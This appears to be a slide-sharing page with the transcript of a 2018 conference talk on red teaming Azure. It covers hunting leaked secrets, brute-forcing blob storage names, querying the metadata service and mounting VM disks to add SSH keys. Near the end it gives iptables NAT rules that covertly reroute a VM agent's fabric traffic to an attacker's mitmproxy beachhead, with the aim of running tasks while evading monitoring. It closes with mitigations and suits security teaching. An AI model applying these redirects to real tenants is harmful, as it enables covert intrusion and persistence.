Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Blue Cloud of Death: Red Teaming Azure

Blue Cloud of Death: Red Teaming Azure

BSides Nashville Presentation on April 14 2018

Blue Cloud of Death: Red Teaming Azure

On-demand IT services are being publicized as the “new normal”, but often times these services are misunderstood and hence misconfigured by engineers which can frequently enable red teams to gain, expand, and persist access within Azure environments.

In this talk we will dive into how Azure services are commonly breached (e.g. discovering insecure blob storage), and then show how attackers are pivoting between the data & control planes (e.g. mounting hard disks, swapping keys, etc...) to expand access. Finally we will demonstrate some previously unknown techniques for persisting access within Azure environments for prolonged periods of time.

Bryce Kunz (Chief Hacker & President at Stage 2 Security)
Bryce Kunz (@TweekFawkes) loves researching and red teaming bleeding edge IT services. Bryce is currently the Chief Hacker & President at Stage2Sec.com where he released various open source tools (e.g. soMeta, lolrusLove, yupPhrasing, etc…) and has contributed several modules to open source projects (e.g. empire). Previously, Bryce has supported the NSA (network exploitation & vulnerability research), Adobe (built red teaming program for cloud services), and DHS (incident response). Bryce holds numerous certifications (e.g. OSCP, CISSP, ...), and has spoken at various security conferences (i.e. BlackHat, DerbyCon, BSidesLV, etc...).

TweekFawkes

April 14, 2018
Tweet

More Decks by TweekFawkes

Other Decks in Technology

Transcript

  1. THE PAST RED & BLUE... Red Team Adobe Digital Experience

    (DX) Bryce Kunz @TweekFawkes Offense NSA Defense DHS SOC
  2. THE PRESENT CYBER SECURITY SERVICES Stage 2 Security BSidesSLC (

    Red Teaming AWS & Azure Env. ) ( By & For the People ) Stage2Sec.com BSidesSLC.org Bryce Kunz @TweekFawkes
  3. TRAINING AWS & AZURE EXPLOITATION: MAKING THE CLOUD RAIN SHELLS!

    BlackHat EU (London) SOLD OUT! BlackHat USA (Las Vegas, NV)
  4. CONTROL Azure CIoud Portal Control Data Admin … From our

    vantage point … … mostly just REST APIs …
  5. SERVICES Azure CIoud Portal VMs Control Storage Data Apps Admin

    …too many for any human to care about… LBs
  6. SERVICES Portal VMs Control Storage Data Apps Admin …too many

    for any human to care about… LBs Azure CIoud
  7. OSINT Azure CIoud Portal Control Storage Data Apps Admin …

    LBs … CI Pipeline Users VMs Dev Internet Collaboration Hacker
  8. REPOS Azure CIoud Portal Control Storage Data Apps Admin …

    LBs … CI Pipeline Users VMs Dev Internet Collaboration Hacker Repos
  9. BITBUCKET Bryce Kunz - @TweekFawkes Find a Azure Secrets •

    Open Source Intel • Code Repositories • - BitBucket, GitLab • - Gerrit, GitBlit, Git • - SVN, etc…
  10. CI Azure CIoud Portal Control Storage Data Apps Admin …

    LBs … CI Pipeline Users VMs Dev Internet Collaboration Hacker Repos
  11. DEPLOY ACCESS Bryce Kunz - @TweekFawkes Find a Azure Secrets

    • Open Source Intel • Code Repositories • Deployment Tools • - Puppet, etc… • - Jenkins, etc…
  12. Azure CIoud Portal Control Storage Data Apps Admin … LBs

    … CI Pipeline Users VMs Dev Internet Collaboration Hacker Repos ENDPOINT
  13. HACK & D/L ACCESS Bryce Kunz - @TweekFawkes Find a

    Azure Secrets • Open Source Intel • Code Repositories • Deployment Tools • Configuration Files • - Classic Hacks • -- D/L Secrets
  14. Azure CIoud Portal Control Storage Data Apps Admin … LBs

    … CI Pipeline Users VMs Dev Internet Collaboration Hacker Repos MANY ROADS TO PWNAGE
  15. DNS BRUTE FORCE … … - Only contains lowercase letters

    and numbers. - Name must be between 3 and 24 characters. Lower Chars & Nums Count Run Time (100 Threads) 3 46,656 ~1 min 4 1,679,616 ~25min 5 60,466,176 ~15 hours 6 … etc … … etc …
  16. BRUTE FORCE Possible but kind of sucks to brute force

    or guess three separate variables/parameters in the URL. e.g.: https://bcodstoragetest005.blob.core.windows.net/containertest005/test.txt Storage Account Name: bcodstoragetest005 Container Name: containertest005 Blob Name: test.txt
  17. LOLRUSLOVE Spider Website for Links to Azure Blobs • CNAME

    Lookup on FQDNS TODO: INSERT Screen Shot TODO: Demo?
  18. Azure CIoud Portal Control Storage Data Apps Admin … LBs

    … CI Pipeline Users VMs Dev Internet Collaboration Hacker Repos STORAGE
  19. FIND CERT *.publishsettings Get-AzurePublishSettingsFile • Management Certificates A "publish settings

    file" is an XML file with a .publishsettings file name extension. The file contains an encoded certificate that provides management credentials for your Azure subscriptions.
  20. FIND SECRET “web.config” - ASP.NET “app.config” - C#.NET • SAS

    URI • Connection String • Account Name & Key
  21. VHDS Download vhds • Code Review • Secrets on Disk

    • Linux - grep for “shadow” hashes
  22. VHDS Download vhds • Code Review • Secrets on Disk

    • Linux - grep for “shadow” hashes
  23. Azure CIoud Portal Control Storage Data Apps Admin … LBs

    … CI Pipeline Users VMs Dev Internet Collaboration Hacker Repos ENDPOINT
  24. CLI AUTH. “az login” (After logging in, your login token

    is valid until it goes for 14 days without being used.)
  25. BROWSER COOKIE “az login” (After logging in, your login token

    is valid until it goes for 14 days without being used.)
  26. STEAL COOKIE! “az login” (After logging in, your login token

    is valid until it goes for 14 days without being used.)
  27. CLI AUTH. “az login” (After logging in, your login token

    is valid until it goes for 14 days without being used.)
  28. Azure CIoud Portal Control Storage Data Apps Admin … LBs

    … CI Pipeline Users VMs Dev Hacker DATA -> CONTROL
  29. AZURE META Metadata Service: 169.254.169.254 curl http://169.254.169.254/metadata/v1/maintenance curl http://169.254.169.254/metadata/v1/InstanceInfo (these

    are mostly useless for hackers…) but useful information is copied into the … /var/lib/waagent directory when the instance is created… (root access needed) • IP address, hostname, subscription ID, resource group name, etc… …
  30. Azure CIoud Portal Control Storage Data Apps Admin … LBs

    … CI Pipeline Users VMs Dev Hacker CONTROL -> DATA
  31. HARD BOOT Google: “Reset local Windows password for Azure VM

    offline” … Horrible OPSEC but it works… - Power off a server - Mount the server’s hard drive using another VM - Modify the server for remote access (e.g. add an SSH key to root user) - Power back on the server & PROFIT!
  32. Azure CIoud Portal Control Storage Data Apps Admin … LBs

    … CI Pipeline Users VMs Dev Internet Collaboration Hacker Repos STORAGE
  33. Azure CIoud Portal Control Storage Data Apps Admin … LBs

    … CI Pipeline Users VMs Dev Internet Collaboration Hacker Repos CONTROL
  34. SERVICE PRINCIPALS (the recommended approach) Permissions-Restricted Accounts “az login --service-principal”

    … …not tied to any particular user… …have permissions on them assigned through pre-defined roles. Multiple Passwords!
  35. START DIGGING • ps auxfww • file • python source

    code review Listening Services • netstat -nltpu Active Connections • netstat -natpu
  36. • b: set a breakpoint • c: continue debugging until

    you hit a breakpoint • s: step through the code • n: to go to next line of code • l: list source code for the current file (default: 11 lines including the line being executed) • u: navigate up a stack frame • d: navigate down a stack frame • p: to print the value of an expression in the current context PYTHON DEBUGGER • pdb
  37. SYSDIG sysdig -w 005.scap systemctl start walinuxagent.service /usr/bin/python3 -u /usr/sbin/waagent

    –daemon sysdig -r 005.scap … • -c topfiles_bytes • -c topprocs_net • -c echo_fds • -c fdbytes_by fd.directory "fd.type=file“ • -c fdbytes_by fd.filename "fd.directory=/var/lib/waagent“ …
  38. TASKS Periodically pulls HTTP API for taskings • http://168.63.129.16 •

    (local azure fabric address) <Incarnation>2</Incarnation> • Signals agent for additional tasks Control http://168.63.129.16 GET /machine/?comp=goalstate --- <Incarnation>2</Incarnation>… Agent
  39. HOST CONFIGS Pulls hostingEnvironmentConfig Control http://168.63.129.16 GET /machine/ … type=

    hostingEnvironmentConfig --- rd_fabric_stable_dhf5.150807- 2320.RuntimePackage_1.0.0.14. zip Agent
  40. EXTENSION CONFIGS Pulls Extension Configuration • In this case, the

    command to run Control http://168.63.129.16 GET /machine/ … type=extensionsConfig --- Command to Run Agent
  41. VMs Portal Control Storage Data Admin … … CI Pipeline

    Users VMs Dev Internet Hacker Repos CREDS IN REPO
  42. VMs Portal Control Storage Data Admin … … CI Pipeline

    Users VMs Dev Internet Hacker Repos VHDS -> CERTS
  43. VMs Portal Control Storage Data Admin … … CI Pipeline

    Users VMs Dev Internet Hacker Repos SUBSCRIPTION
  44. PERSIST? Without getting caught? Bypass • File Integrity Monitoring •

    So we can’t modify files • osquery - process list • So we can’t be seen in ps • osquery - netstat • So we can’t be seen in netstat … ?
  45. VMs Storage Users Hacker BEACHHEAD Control http://168.63.129.16 Malware Agent Beachhead

    10.0.4.5 VMs 10.0.4.4 Ideally… • Not of high value • Not monitored closely Install our Malware • To ensure access
  46. VMs Storage Users VMs 10.0.4.4 Hacker REDIRECT Control http://168.63.129.16 Beachhead

    10.0.4.5 Malware Agent Redirect Agent • via iptables iptables -t nat -I OUTPUT -p tcp --dport 80 -d 168.63.129.16 -m comment --comment "totes not evil" -j DNAT -- to-destination 10.0.4.5:80 Netstat Looks Normal! No New Procs!
  47. VMs Storage Users VMs 10.0.4.4 Hacker MITM Control http://168.63.129.16 Beachhead

    10.0.4.5 Malware Agent Pass API Requests • via mitmproxy iptables -t nat -I OUTPUT -p tcp --dport 80 -d 10.0.4.5 -m comment -- comment "totes not evil" -j DNAT --to-destination 168.63.129.16:80 MITM
  48. VMs Storage Users Hacker EXEC Control http://168.63.129.16 Beachhead 10.0.4.5 Malware

    Tasks Created within the Azure Subscription for the Beachhead with the MITM software on it, which will get redirected and executed on the remote target through the pulling process of the Azure endpoint agent MITM Agent VMs 10.0.4.4
  49. MITIGATIONS • Single Purpose Secrets • Limited the Access of

    each Secret • Create roles and limit the access of each role • You can ACL off secrets to only work from certain IP addresses • Log API calls (e.g. cloudtrail) • Never use root secrets (use as a break glass account only) • Rotate Secrets Frequently • Encrypt secrets within GIT and other data stores …
  50. THANKS! Stage 2 Security BSidesSLC ( Red Teaming AWS &

    Azure Env. ) ( By & For the People ) Stage2Sec.com BSidesSLC.org Bryce Kunz @TweekFawkes AWS & Azure Exploitation Training @ BlackHat EU (London)